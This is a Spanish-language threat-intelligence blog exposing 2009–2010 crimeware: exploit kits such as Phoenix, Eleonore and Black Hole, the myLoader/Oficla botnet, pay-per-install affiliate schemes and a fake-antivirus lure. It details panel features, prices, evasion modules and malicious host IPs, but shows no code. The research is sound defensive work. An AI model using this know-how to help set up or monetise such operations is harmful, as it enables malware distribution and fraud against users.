MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

27.10.10

Crimeware exposed

Actualmente, el crimeware es ampliamente explotado por individuos o grupos delictivos que buscan incrementar su economía de forma completamente fraudulenta empleando estrategias evasivas y agresivas.

Para MalwareIntelligence, la lucha contra el ciber-crimen se ha transformado en su filosofía y objetivo primario, que hacen del día a día una excusa perfecta para abordar diferentes investigaciones que luego se canalizan a través de alguno de sus blogs.

Es por ello que a lo largo del tiempo, se ha expuesto información relevante que forma parte de algunas investigaciones abordadas, que en su conjunto (las del año 2009) pueden encontrar en “Compendio Anual de Información: El crimeware durante el 2009”, y a continuación, el resumen de los paquetes expuestos a través de MalwareIntelligence durante los últimos dos años:

Malware kit y Exploits Pack

6.10.10 Eleonore Exploit Pack. Nueva versión (1.4.4mod)
1.10.10 Phoenix Exploit’s Kit v2.3 Inside
30.9.10 Black Hole Exploits Kit. Otro crimeware que se suma a la oferta delictiva
8.9.10 Phoenix Exploit’s Kit v2.1 Inside
18.8.10 Estado del arte en Phoenix Exploit's Kit
3.7.10 BOMBA Botnet. Nueva alternativa delictiva alimentando la economía del crimeware
30.6.10 n0ise Bot. Crimeware de propósito particular para ataques DDoS
26.6.10 Breve revisión de Passenger Admin Panel
24.6.10 Estado del arte en Eleonore Exploit Pack II
19.5.10 Estado del arte en CRiMEPACK Exploit Pack
31.3.10 Strike Botnet, otra crimeware que nace
28.3.10 iPack y GOLOD. Nuevos crimeware en la escena delictiva
6.3.10 myLoader. Framework para la gestión de botnets
27.1.10 SpyEye. Nuevo bot en el mercado
9.1.10 Napoleon Sploit. Frameware Exploit Pack
3.1.10 Estado del arte en Eleonore Exploit Pack
25.12.09 Siberia Exploit Pack. Otro paquete de explois In-the-Wild
15.12.09 RussKill. Aplicación para realizar ataques de DoS
9.12.09 Fusión. Un concepto adoptado por el crimeware actual II
3.12.09 Una breve mirada al interior de Fragus
29.11.09 JustExploit. Nuevo Exploit Kit que explota Java
22.11.09 DDoS Botnet. Nuevo crimeware de propósito particular
15.11.09 T-IFRAMER. Kit para la inyección de malware In-the-Wild
4.11.09 QuadNT System. Sistema de administración de zombis I (Windows)
2.11.09 ZoPAck. Nueva alternativa para la explotación de vulnerabilidades
14.10.09 DDBot. Más gestión de botnets vía web
26.9.09 Nueva versión de Eleonore Exploits Pack In-the-Wild
17.9.09 Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
7.9.09 iNF`[LOADER]. Control de botnets, marihuana y propagación de malware
29.8.09 Hybrid Botnet Control System. Desarrollo de http bot en perl
15.8.09 Fragus. Nueva botnet framework In-the-Wild
14.8.09 Liberty Exploit System. Otra alternativa crimeware para el control de botnets
8.8.09 TRiAD Botnet III. Administración remota de zombis multiplataforma
4.8.09 Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
3.8.09 TRiAD Botnet II. Administración remota de zombis multiplataforma
25.7.09 TRiAD Botnet. Administración remota de zombis en Linux
11.7.09 Especial!! ZeuS Botnet for Dummies
29.6.09 ElFiesta. Reclutamiento zombi a través de múltiples amenazas
14.6.09 Mirando de cerca la estructura de Unique Sploits Pack
2.6.09 Fusión. Un concepto adoptado por el crimeware actual
27.5.09 Unique Sploits Pack. Manipulando la seguridad del atacante II
21.5.09 YES Exploit System. Manipulando la seguridad del atacante
22.4.09 Adrenaline botnet: zona de comando. El crimeware ruso marca la tendencia
18.4.09 Chamaleon botnet. Administración y monitoreo de descargas
12.4.09 YES Exploit System. Otro crimeware made in Rusia
26.3.09 Barracuda Bot. Botnet activamente explotada
6.3.09 Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades
27.2.09 LuckySploit, la mano derecha de Zeus

Actividades botnets


8.9.10 myLoader C&C Oficla Botnet en BKCNET "SIA" IZZI con la mayor tasa de infección en Brasil
9.8.10 Campaña de infección a través de Phoenix Exploit’s Pack
25.7.10 Circuito de Koobface desde 91.188.59.10 (BKCNET "SIA" IZZI)
11.7.10 YES Exploit System como Crimeware-as-a-Service
28.5.10 Inteligencia y nivel de explotación según Siberia Exploit Pack
19.4.10 Scam de ZeuS sobre IRS continúa siendo activamente explotado
15.3.10 Nueva campaña de phishing contra Facebook encabezada por ZeuS
7.3.10 Oficla botnet con más de 200.000 zombis reclutados
24.2.10 Nueva campaña de phishing de ZeuS contra Google y Blogger
22.2.10 Campaña de phishing a Facebook y VISA propuesta por ZeuS
28.1.10 ZeuS y el robo de información sensible
22.1.10 Aprovechando ZeuS para enviar spam a través de redes sociales
16.1.10 YES Exploit System. Official Business Partner’s
2.1.10 Waledac. Línea de tiempo '07-'09
1.1.10 Waledac vuelve con otra estrategia de ataque
1.12.09 Campaña de propagación de Koobface a través de Blogspot
6.11.09 Desarrollo de Botnets Open Source. “My last words”?
24.10.09 ZeuS Botnet y su poder de reclutamiento zombi
17.10.09 ZeuS, spam y certificados SSL
21.9.09 Eficacia de los antivirus frente a ZeuS
17.8.09 Desarrollo de crimeware Open Source para controlar y administrar botnets
8.7.09 Waledac/Storm. Pasado y presente de una amenaza latente
4.7.09 Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
21.6.09 Simbiosis del malware actual. Koobface
1.6.09 Botnet. Securización en la nueva versión de ZeuS
4.5.09 ZeuS Carding World Template. Jugando a cambiar la cara de la botnet
7.4.09 Waledac. Seguimiento detallado de una amenaza latente
4.4.09 Conficker IV. Dominios relacionados... y controversiales
3.4.09 Conficker III. Campaña de propagación de falsas herramientas de limpieza
2.4.09 Conficker II. Infección distribuida del gusano mediático
1.4.09 Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo
27.3.09 Entidades financieras en la mira de la botnet Zeus. Segunda parte
25.3.09 Entidades financieras en la mira de la botnet Zeus. Primera parte
22.2.09 Zeus Botnet. Masiva propagación de su troyano. Segunda parte
18.2.09 Zeus Botnet. Masiva propagación de su troyano. Primera parte
28.1.09 Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs

Ver más

6.10.10

Eleonore Exploit Pack. Nueva version

Sin renovar alternatives funcionales dentro del paquete, aparece una nueva versión del crimeware Eleonore Exploit Pack. Se trata de la versión 1.4.4mod.


Panel de acceso a Eleonore Exploit Pack 1.4.4mod

Si bien esta versión del crimeware se posiciona como parte de una batería de alternativas cuyo número se incrementa constantemente gracias a la importante oferta que actualmente existe en el ámbito delictivo, no representa la opción extremadamente viable para los delincuentes. Y de hecho, esta versión en particular, parearía no tener mayores características relevantes que no se encuentren en sus anteriores versiones.

Publicidad del paquete en foro underground

Como se aprecia en la imagen, incorpora un total de 16 exploits que poseen un alto porcentaje de éxito en la explotación a nivel global. Sin embargo, a pesar de que esta versión particularmente no es motivo de alarma ni de investigación para los profesionales de seguridad, las actividades delictivas generadas a través de Eleonore Exploits Pack se manifiestan diariamente, siendo la versión 1.3 la más empleada.

Información relacionada
Estado del arte en Eleonore Exploit Pack II
Estado del arte en Eleonore Exploit Pack
Nueva versión de Eleonore Exploits Pack In-the-Wild
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Black Hole Exploits Kit. Otro crimeware que se suma a la oferta delictiva
Defacement by "Exploit Pack's"

Ver más

1.10.10

Phoenix Exploit’s Kit v2.3 Inside

PEK (Phoenix Exploit’s Kit) se ha transformado en uno de los recursos más empleados por quienes día a día inundan Internet con diferentes tipos de códigos maliciosos. Actualmente, un importante volumen de malware es distribuido a través de este crimeware, que también es ampliamente utilizado para el acopio de información relevante para un botmaster.

Anteriormente habíamos mencionado cómo se ve por dentro la versión 2.1 y en ese mismo momento decíamos que desde el punto de vista de su diseño, las diferentes versiones de PEK se ven prácticamente de forma muy similar, con el típico fondo oscuro, el ave Fénix en el ángulo inferior derecho y de frente su sistema de autenticación trivial a simple vista, pero que sin embargo realiza una verificación bajo el algoritmo SHA1.

En esta oportunidad, se trata de la versión 2.3 de PEK, la final y estable hasta el momento (existe una versión preliminar a la 2.4 conocida como 2.3r). Sin embargo, a pesar de no aparentar diferencias visibles, esta versión, además de actualizar una serie de “detalles” en su código, incorpora varios de los exploits que actualmente representan la mayor tasa de éxito.

 
Simple statistics
Muestra información sobre los datos generales en tonos a la información grabada con PEK.

Advanced statistics
Muestra información detallada de los sistemas operativos y navegadores vulnerados.

Countries statistics
Muestra datos estadísticos de los países donde se encuentran los zombis.

Referer data
Lista las páginas web de referencia directa.

La lista que presenta la versión empleada para este artículo es muy larga, pero se encuentra completa en el siguiente enlace: PEK v2.3 Referers List.

 
Upload module
Permite actualizar el malware que se disemina.

Los exploits que incorpora por defecto esta versión son:
Su "puesta en venta" se comenzó a principios de Julio de 2010 a un costo de $ 2.200. Un detalle interesante lo constituye la frase que se muestra con el logotipo: "CONCORDIA, INTEGRITAS, INDUSTRIA…", tres palabras en latín que se encuentran íntimamente relacionadas con una famosa familia alemana. Su traducción es concordia, integridad y diligencia.

Respecto al binario ejecutable propagado, en este caso, se trata de una variante del troyano generado con el constructor privado de SpyEye:
En el White paper llamado Phoenix Exploit’s Kit. De la mitología a un negocio delictivo pueden obtener mayor información sobre las diferentes versiones de este crimeware.

Información relacionada
Phoenix Exploit’s Kit v2.1 Inside
Estado del arte en Phoenix Exploit's Kit [White paper]

Campaña de infección a través de Phoenix Exploit’s Pack
Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets

Jorge Mieres
Founder & Director of MalwareIntelligence
Crimeware & Intelligence Analyst Researcher

Ver más

30.9.10

Black Hole Exploits Kit. Otro crimeware que se suma a la oferta delictiva

La industria del crimeware sigue creciendo a través de la puesta en desarrollo y comercialización de nuevos paquetes de exploits pre-compilados que se suman a la oferta de alternativas destinadas a facilitar las maniobras delictivas a través de Internet.

En este caso, se trata de Black Hole Exploits Kit, una aplicación web desarrollada en Rusia pero que además incorpora para su interfaz el idioma inglés, y cuya primera versión (beta por el momento) está intentando insertarse en el mercado clandestino desde principios de septiembre de 2010. Su costo esta determinado en función de una serie de características que intentan diferenciarlo del resto.

Módulo estadístico de Black Holes Exploits Kit
Este módulo ofrece una visualización rápida de la información más relevante para un botmaster: cantidad de equipos que forman parte de la red y sus respectivos países, exploits con mayor tasa de éxito y demás información procesada.

A diferencia de muchos otros crimeware de este estilo, Black Hole Exploits Kit utiliza un sistema de licenciamiento por tiempo que determina su costo. Por ejemplo, adquirir este crimeware durante 1 año (por el momento el tiempo máximo) tiene un costo de $ 1500 dólares, mientras que una licencia semestral y trimestral, cuestan $ 1000 y $ 700 respectivamente.

Estadísticas sobre los sistemas operativos afectados
La tendencia marca un leve pero paulatino incremento de sistemas operativos comprometidos que no pertenecen a la familia de Microsoft. En este crimeware se incluye plataformas basadas en *NIX como GNU/Linux y Mac OS. Otros, como Eleonore Exploits Pack y Siberia Exploit Kit incluyen plataformas para dispositivos celulares de alta gama y consolas de videojuegos.

Además, posee costos de $ 50 por la alternativa de utilizar su sistema de cifrado. Esta característica constituye un patrón para los servicios "extras" ofrecidos por los desarrolladores de crimeware, al igual que la posibilidad de verificar la integridad del malware (AVChecker) diseminado a través del crimeware.

Para llevar a cabo esta verificación, se está utilizando con mayor frecuencia VirTest, el servicio privado de origen ruso que se ha transformado en el favorito de los delincuentes para controlar la reputación no sólo del malware diseminado sino que también del mismo exploits pack. Son varios los paquetes crimeware que recientemente han incorporado el módulo VirTest, entre ellos, la última versión de SpyEye.

En cuanto a los exploits, todos los que incorpora por el momento son públicos y ampliamente utilizados por la mayoría del crimeware actual. A pesar de ello, estos exploits poseen la mayor tasa de éxito en explotación.

Estadísticas de exploits
A través de este módulo se visualizan los datos estadísticos sobre la capacidad de éxito que posee cada uno de los exploits que forman parte del crimeware.

Black Hole Exploits Kit incorpora un TDS (Traffic Direction Script) que le permite independizarse de otra aplicación web que permita manipular arbitrariamente el tráfico web, y seguramente esta característica atrapará la atención de los delincuentes.

También posee un módulo auto-defensivo mediante el cual permite bloquear el acceso a determinados sitios web de seguridad mediante URL o rangos de dirección IP. En la siguiente imagen se encuentra configurado el bloqueo del acceso a los sitios web de Kaspersky Antivirus:

Módulo auto-defensivo
A través de este módulo también se puede importar o exportar una lista con direcciones a bloquear.

Black Hole Exploits Kit se suma a la cartera de ofertas y a poco más de un mes desde su lanzamiento en los ambientes underground no presenta mayor actividad In-the-Wild, quizás debido a su costo inicial. Sin embargo,  los profesionales de seguridad debemos prestar especial atención a este crimeware ya que por sus características y costo (que seguramente disminuirá levemente para la próxima versión) será muy bien aceptado dentro de la comunidad delictiva y, por ende, objeto de demanda por parte de los delincuentes.

Información relacionada
 
Jorge Mieres
Founder & Director of MalwareIntelligence
Crimeware & Intelligence Analyst Researcher

Ver más

10.9.10

Black Software. Nuevo afiliado de negocios del tipo Pay-per-Install

El modelo de negocio que representan los programas de afiliados a través de sistemas del tipo Pay-per-Install se encuentra en pleno auge, constituyendo una pieza fundamental para los grupos delictivos que buscan aumentar su economía.

En este caso, hemos dado con un nuevo programa de afiliados  llamado Black Software, que promociona la descarga de programas maliciosos.

 Panel de acceso a Black Software
Se trata de un proceso de autenticación simple y convencional que requiere usuario y contraseña

El programa es de origen ruso y según su dirección IP tiene base en los Países Bajos. Comenzó con su propuesta de empresa a finales de Agosto de 2010 y posee un mecanismo mediante el cual cada afiliado debe configurar cierta información para obtener las URL necesarias para comenzar el negocio.

 Guía de Black Software
Esta guía proporciona información sobre cómo configurar de forma correcta los datos necesarios para obtener las URL, junto a un breve FAQ.

Como es habitual, el proceso de registro requiere una serie de información que  permiten a quien se encuentra detrás del sistema de afiliados, validar al potencial cliente y evitar una potencial infiltración. 
También cuenta con un módulo estadístico mediante el cual los afiliados chequean su status que cada 15 minutos es actualizado por el administrador del sistema, pudiendo visualizar información relacionada a cada descarga.

Módulo estadístico
Mediante el cual el sistema de afiliados provee la información necesaria para que cada “cliente” pueda chequear el estado de su cuenta.

El pago se realiza semanalmente y para aquellas cuentas que poseen un importante caudal de ingresos, es opcional poder establecer en qué momento desea que se realice el pago por las actividades delictivas que a través de esta aplicación web realiza.

Black Software es convencional y no posee un factor diferenciador respecto a otros programas de afiliados de su estilo, y aún no posee un alto porcentaje de actividades, quizás por su condición de "nuevo" en el ambiente delictivo y, por lo tanto, no tan conocido.

Sin embargo, representa otro recurso a disposición de quienes día a día alimentan su economía  a través de procesos fraudulentos y delictivos.

Información relacionada
Circuito de afiliación para la diseminación de NoAdware
Pirated Edition. Programa de afiliados Pay-per-Install
Pay-per-Install a través de VIVA INSTALLS / HAPPY INSTALLS en BKCNET “SIA” IZZI

Ver más

8.9.10

Phoenix Exploit’s Kit v2.1 Inside

Este crimeware es uno de los más utilizados por los ciber-delincuentes para recolectar información de inteligencia que permita conocer las tendencias en torno a usos y costumbres por parte de las personas que utilizan Internet cotidianamente.

Esta información de interés busca obtener en tiempo y forma un detalle completo de las víctimas que, a posterior, les permita a los delincuentes conocer sobre qué factores enfatizar sus "mejoras" en la aplicación web, y a los botmaster pensar en alguna estrategia de diseminación de malware.

¿Para qué? Obtener información procesada (inteligencia) es clave porque les permite contar con información real sobre las diferentes tecnologías utilizadas por las personas. Este tipo de maniobras es ampliamente utilizado por los delincuentes. ¿Alguna vez se preguntaron por qué Koobface se propaga por redes sociales? 

Por ejemplo, la mayoría del crimeware de este estilo acopian datos sobre:
  • Tipo y versión de plataformas. Permite conocer cuáles son los sistemas operativos más utilizados y los más vulnerables.
  • Tipo y versión de navegadores. Busca comprender la misma característica que el punto anterior.
  • Países afectados. Permite conocer la cantidad de computadoras víctimas en cada país. De esta manera, el botmaster podría discriminar la propagación de malware orientando su promoción a países particulares.
¿Por qué? Porque toda esta información le permite al desarrollador poder agregar y/o mejorar los exploits que incorpora en versiones "mejoradas" del "producto". Además, en función del último punto por ejemplo, la sencillez en cuanto a la fácil lectura de los datos estadísticos hace que muchos botmaster utilicen PEK (Phoenix Exploit’s Kit) para propagar malware que es utilizado como "puente" para registrar descargas e instalaciones exitosas para incrementar su economía a través de sistemas de afiliados del tipo Pay-per-Install.

Actualmente el desarrollo de PEK se encuentra en su versión 2.3r, siendo esta una versión preliminar a la 2.4 y que se encuentra en su etapa de "testeo" desde mediados de agosto de 2010. La última versión "estable" es la 2.3.

Sin embargo, este post trata sobre la versión 2.1 de Phoenix Exploit’s Kit, y veremos que desde el punto de vista visual no cambió en sus versiones anteriores ni cambia en las posteriores.

Por defecto posee 10 exploits, que son los siguientes:
Esta versión arrastró la característica Phoenix Triple System incorporada a partir de la versión 1.4, que básicamente consiste en un sistema de cifrado para los binarios ejecutables que se diseminan. El objetivo de esto es entorpecer los procesos de análisis sobre el malware.

Se compone de 6 módulos de los cuales 4 proporcionan información de interés de cada equipo que forma parte de la botnet.

Simple statistics
Es una visión general de los datos recolectados, mediante el cual se visualiza información sobre los navegadores que presentan el mayor porcentaje de explotación exitosa detallando la cantidad de visitas en cada uno de ellos, cantidad total de visitas y los exploits que posee el paquete. En este caso se trata de una versión actualizada donde se le incorporaron algunos exploits

Advanced statistics
Básicamente posee un nivel más de detalle sobre los sistemas operativos y navegadores afectados, incorporando como dato útil la versión de cada uno de ellos. En este caso, los tres sistemas operativos más comprometidos son Windows XP, Vista y Seven respectivamente, y con un porcentaje mínimo comparado con estos pero mayor a Windows ME, 2000 y 2003, se encuentran las plataformas Linux.

Curiosamente, en cuanto a los navegadores, los tres que cuentan con mayor tasa de vulnerabilidad son Firefox 3.6, InternetExplorer 8 y 7 respectivamente.


 Countries statistics
Información relacionada a los países en los cuales se encuentran los equipos comprometidos. El detalle de esta información está en la cantidad de visitas desde determinado país y la cantidad de exploits que han tenido éxito, también discriminados por países.

Referers statistics
Información de los sitios web de referencia a Phoenix Exploit’s Kit. La característica principal radica en que el patrón seguido por PEK es el referenciamiento desde páginas pornográficas desde las cuales se explota a través del navegador algunos de los exploits pre-compilados en el paquete. Este módulo muestra la lista de páginas, la cantidad de visitas por páginas y la cantidad de exploits que han tenido éxito junto a un promedio expresado en porcentajes.

La lista que presenta la versión empleada para este artículo es muy larga, pero se encuentra completa en el siguiente enlace: PEK v2.1 Referers List.

Upload .exe
Este módulo es el que permite actualizar el código malicioso a diseminar. Generalmente sólo lo cambian cada vez que someten el binario ejecutable a procesos de cifrado del servicio Phoenix Triple System, o cuando los botmaster cambian su estrategia de infección en función de nuevos objetivos para con el malware. Cambio de sistema de afiliados que diseminan su propio malware por ejemplo.

En este caso, PEK es utilizado para propagar una versión del troyano generado con ZeuS:
En el White paper llamado Phoenix Exploit’s Kit. De la mitología a un negocio delictivo pueden obtener mayor información sobre las diferentes versiones de este crimeware.

Información relacionada
Estado del arte en Phoenix Exploit's Kit [White paper]

Campaña de infección a través de Phoenix Exploit’s Pack
Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets



Jorge Mieres
Founder & Director of MalwareIntelligence
Crimeware & Intelligence Analyst Researcher

Ver más

myLoader C&C Oficla Botnet en BKCNET "SIA" IZZI con la mayor tasa de infección en Brasil

myLoader es una aplicación web que permite a los delincuentes recolectar información estadística relacionada a diferentes factores y características sobre cada una de las computadoras infectadas. Este crimeware es comercializado en el mercado underground a un costo promedio de USD 700.

La botnet Oficla comenzó con sus actividades delictivas a principios de 2010 y precisamente el binario ejecutable, detectado por los motores antivirus como Oficla o Sasfis, es generado a través de un constructor que incorpora myLoader.

A principios de 2010, MalwareIntelligence alertó sobre las actividades de una botnet Oficla con más de 250.000 computadoras reclutadas, que luego de varios días más supero la cifra de 300.000 zombis. Un White paper que explica el modo de comercialización del crimeware y operación de la botnet se encuentra disponible en la sección documentos.

La región latinoamericana cuenta con un importante desarrollo de malware, destacándose, sin lugar a dudas, Brasil con la generación de códigos maliciosos diseñados para robar datos de índole financiero a través de troyanos bancarios que habitualmente se diseminan por correo electrónico o MSN.

Sin embargo, no es el único en la región y países como Mexico, Perú y Argentina, acompañan la tendencia también con un importante caudal de delincuentes que aspiran, incluso, a copiar los modelos de negocios delictivos y fraudulentos que desde el otro lado del mundo cotidianamente generan nuevos puntos de investigación a causa de los incidentes de seguridad que provocan, principalmente el robo de información.

Bajo toda esta escenografía, las botnets juegan un papel fundamental en un alto porcentaje, donde me atrevo a decir casi todos, de los delitos que se cometen a través de Internet. Es decir, el rol de las botnets dentro del ámbito actual del cibercrimen, representan la pieza clave con la que cuentan los delincuentes informáticos.

La siguiente imagen es un ejemplo de ello. Se trata de una botnet de Oficla gestionada a través de myLoader, que cuenta con un total de 9065 zombis reclutados.

Estadísticas de myLoader
Básicamente muestra información relacionad a la cantidad de computadoras comprometidas durante los últimos 15 días, cuantas de ellas se encuentran online, entre otros

Y evidenciando lo que mencionaba líneas arriba, el top ten de países afectados lo encabeza Brasil con un poco más de 1300 zombis (casi el 15%), y en lo que a Latinoamérica respecta, le siguen México y Argentina.


Estadísticas de geolocalización de zombis
Esta imagen sólo muestra el top ten de países afectados donde la botnet posee zombis

Computadoras afectadas sólo en Brasil
La lista es muy larga y básicamente muestra información sobre las computadoras infectadas

Una particularidad interesante es que esta botnet se encuentra bajo el techo del AS6851 en la dirección IP 91.188.60.97. Conocido bajo el nombre de BKCNET "SIA" IZZI o SAGADE, ampliamente popular por su relación con el alojamiento de recursos delictivos como ZeuS, Koobface, afiliados de negocios, entre muchos otros.

En la sección documentos se puede descargar un White paper con información de los recursos delictivos asociados a un determinado rango de direcciones IP que se encuentran bajo la tutela de BKCNET "SIA" IZZI.

En cuanto a los códigos maliciosos que se diseminan a través de esta botnets, se encuentran los siguientes binarios ejecutables:

Información relacionada
Oficla botnet con más de 200.000 zombis reclutados
myLoader. Framework para la gestión de botnets
myLoader. Base C&C to manage Oficla/Sasfis Botnet [Whitepaper versión en español]
Criminal activities from BKCNET “SIA” IZZI / ATECH-SAGADE - Part one [Whitepaper versión en español]




Jorge Mieres
Founder & Director of MalwareIntelligence
Crimeware & Intelligence Analyst Researcher

Ver más

Actividades delictivas desde BKCNET “SIA” IZZI / ATECH-SAGADE - Parte uno

BKCNET “SIA” IZZI, también conocido como ATECH-SAGADE o simplemente SAGADE, es un AS (Autonomous System) bajo numeración 6851, que actualmente constituye uno de los recursos más activos del crimeware mediante el cual se distribuyen cotidianamente una importante cantidad de códigos maliciosos, además de ser la base de control para el alojamiento de varios C&C que retroalimentan la economía clandestina.

Su geolocalización es en Letonia y, como lo he mencionado en otra oportunidad, “Este ASN está catalogado como servidor de actividades delictivas como la propagación de diferentes familias de rogue, alojamiento de crimeware como YES Exploit System, durante el 2009 alojo las estrategias de la botnet Waledac (sucesora de Storm), también a ZeuS y hasta posee relación directa con los delincuentes que se encuentran detrás de las maniobras de la botnet Koobface”.

Actualmente, la mayoría de los códigos maliciosos que se propagan a través de los recursos soportados por BSI (BKCNET “SIA” IZZI) conforman la maniobra que da soporte a la gestión de sistemas de afiliados destinados, precisamente, a incrementar las ganancias de los delincuentes por intermedio del éxito de las infecciones logradas.

A continuación se deja en evidencia las actividades del AS6851 en el rango de direcciones IP’s aglomeradas entre 91.188.59.9 y 91.188.59.249, a la fecha 14 de Agosto de 2010 (en rojo el historial), que responden a maniobras maliciosas.

Versión en inglés
Versión en español

Ver más

3.9.10

Circuito de afiliación para la diseminación de NoAdware

Detrás del malware se esconde un negocio. Sin lugar a dudas, creo que ya nadie desmiente esta afirmación. Día a día aparece un importante caudal de códigos maliciosos que si bien poseen propósitos generales en cuento a sus actividades, en definitiva buscan retroalimentar el negocio que se esconde detrás a través de mecanismos y estrategias fraudulentas.

Uno de los modelos de negocio más difundidos es el pago de un porcentaje de dinero para quienes logren promover determinado rogue. Este modelo se conoce como programas de afiliados, mientras que el sistema de pago por instalación recibe el nombre de Pay-per-Install.

Este es el caso del rogue NoAdware, un código malicioso de amplia difusión que opera desde hace varios años a través de diferentes coberturas.

Página principal de NoAdware
Desde esta web se descarga el binario que oficia de "recurso económico" para el sistema de afiliados y sus partners

Empleando las estrategias comunes impuestas por sitios web de este estilo, como falsas certificaciones y testimonios que intentan transmitir confianza en las potenciales víctimas, promociona la instalación de una supuesta solución de seguridad que es en realidad el malware.

Generalmente los sistemas de afiliados proveen sólo el ejecutable a diseminar, el cual muchos delincuentes lo propagan a través de algún crimeware del tipo exploit pack, y otros, en menor proporción, sólo lo propagan mediante una página que es creada y hosteada bajo su propia responsabilidad.

El sistema que se esconde detrás de NoAdware, facilita este asunto proporcionando la posibilidad de seleccionar un template y luego solo subirlo al hosting del afiliado. De esta manera, cuando una potencial víctima visita esta web, es direccionado a la página principal de NoAdware, y cada afiliado, en teoría, recibe el 75% de dinero por cada instalación. La venta de rogue (mimetizado en programa de seguridad) es de $47.00.

Sin embargo, también se manejan otros valores en relación directa con la cantidad de licencias:
  • 2 Computers ($67.00)
  • 3 Computers ($87.00)
  • 5 Computers ($117.00)
  • 10 Computers ($197.00)
  • 25 Computers ($417.00)
  • 50 Computers ($767.00)
Selección de sitio web para propagar NoAdware
El proceso consiste en dos etapas: seleccionar el template y descargarlo. Este sitio direccionará el tráfico web hacia la página principal de NoAdware

NoAdware también se promociona bajo el nombre Adware Professional 2010. Es exactamente la misma aplicación maliciosa que reporta su instalación contra el sistema que está detrás de NoAdware.

Hipotéticamente hablando, supongamos que un partner (afiliado/delincuente) logra una instalación exitosa por día durante 30 días (un mes). El 75% sobre $47 es de $35.25 (esto es lo que ganaría por día y por una sola instalación exitosa del malware). En consecuencia, este partner tendría una ganancia teórica de $1057.5 mensualmente.

Este programa de afiliados trabaja con un sistema de pagos a través de Internet, legal, llamado ClickBank, cuya principal particular es que las transacciones comerciales de un gran número de malware del tipo rogue es realizado a través de este sistema.

HopLink para NoAdware
Esta página direcciona el tráfico hacia la página oficial de NoAdware, enviando al mismo tiempo la información del afiliado para que el pago se registre en su cuenta

El direccionamiento es hacia la una URL con la siguiente sintaxis: noadware.net/?hop=[PARTNER-NICK]

De esta forma se registra el pago de un porcentaje de dinero en concepto de comisión para cada uno de los afiliados que forme parte del circuito de este rogue.

Circuito del sistema de afiliados
El gráfico muestra las diferentes etapas que recorre un sistema de afiliados convencional

Una de las evidencias que refleja la tasa de uso de ClickBank por parte de los grupos delictivos para garantizar transacciones económicas "seguras" es el importante caudal de sistemas de afiliados, muchos de ellos promocionan malware, que se encuentran bajo su techo. Algunos de ellos son:
Esta breve lista es solo una pequeña muestra, ya que el volumen de programas maliciosos que se promocionan a través de este medio es muy grande.

Información relacionada
Pay-per-Install a través de VIVA INSTALLS / HAPPY INSTALLS en BKCNET “SIA” IZZI
AntiSpy Safeguard with new social engineering approach

Ver más

30.8.10

FakeAV a través de nueva estrategia de engaño desde BKCNET "SIA" IZZI

Generalmente las estrategias de engaño diseñadas para la diseminación de falsos antivirus (AV Rogue) consisten en la simulación online de un escaneo en busca de malware, mostrando una interfaz que imita el explorador de Windows y en el cual siempre se encuentran las mismas amenazas, incluso cuando se emplean sistemas operativos diferentes a Windows.

Estrategia de engaño convencional
Este es uno de los tantos templates. Se muestra un supuesto escaneo para verificar la integridad del equipo con una interfaz que simula estar bajo el explorador de Windows

Sin embargo, recientemente se puso en marcha una nueva estrategia de similares características pero recurriendo a una maniobra diferente que consiste en mostrar un video real mientras se produce, el supuesto escaneo. Esto se muestra bajo la leyenda "Scan in progress. Please wait".

Nueva estrategia de engaño
Se muestra un video real mientras el tráfico es direccionado hacia un falso reporte con la detección de una amenaza


Mientra se reproduce el video, el tráfico es direccionado hacia otra página en la cual se muestra información sobre supuestas amenazas encontradas luego del escaneo. En esta instancia, supuestamente la información es provista por varios motores antivirus que se listan de forma estratégica mostrando información relacionada a la detección.
 Falso reporte
Según el escaneo se ha detectado malware en el sistema. Así se busca intimar a los usuarios a través del falso reporte con información de varios motores antivirus

Casualmente, cada uno de los "productos" antivirus que detectan supuesta actividad de malware provee la posibilidad de descargar la aplicación que solucionará el problema:
Tanto al comenzar como al finalizar el video, se muestra la leyenda "Protect your privacy! Use only licensed software!". Esto contiene un alto impacto de acción psicológica sobre el usuario quien "se entretiene" mirando un video sobre el robo de datos para luego leer la "recomendación".

Protect your privacy!
Estrategia de acción psicológica que busca provocar un efecto persuasivo sobre el usuario para que luego compre el rogue


Esta estrategia está siendo canalizada a través del AS6851, más conocido como BKCNET "SIA" IZZI o SAGADE. BKCNET "SIA" IZZI  sirve de "repositorio" para promocionar diferentes actividades delictivas y dar cobertura para el alojamiento de botnets y otros crimeware como Koobface, ZeuS, Phoenix Exploit’s Kit, BOMBA, entre otros, además de algunos afiliados de negocio del tipo Pay-per-Install. En este caso, resolviendo desde la dirección IP. 85.234.191.173.

En el equipo se termina instalando un rogue llamado AntiSpy Safeguard que mientras dura su escaneo inicial bloquea el acceso a los recursos del sistema operativo. El objetivo final del rogue es, como habitualmente sucede, lograr que se termine comprando la aplicación maliciosa.

Compra del rogue
Estás páginas generalmente se encuentran bajo la cobertura de servicios legales, y es mediante la cual el delincuente obtiene dinero por la venta de rogue y datos de las tarjetas de crédito


Con esta maniobra el delincuente, o programa de afiliado, se asegura, por un lado un porcentaje de dinero por el costo del rogue; y por el otro, alimentar su base de datos con información de la tarjeta de crédito que luego es comercializado en el mercado negro a costos variables directamente proporcionales al tipo de tarjeta de crédito.

Información relacionada

Pay-per-Install a través de VIVA INSTALLS / HAPPY INSTALLS en BKCNET “SIA” IZZI
Campaña de infección a través de Phoenix Exploit’s Pack
Circuito de Koobface desde 91.188.59.10 (BKCNET "SIA" IZZI)
BOMBA Botnet. Nueva alternativa delictiva alimentando la economía del crimeware
Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus

Ver más

18.8.10

Estado del arte en Phoenix Exploit's Kit

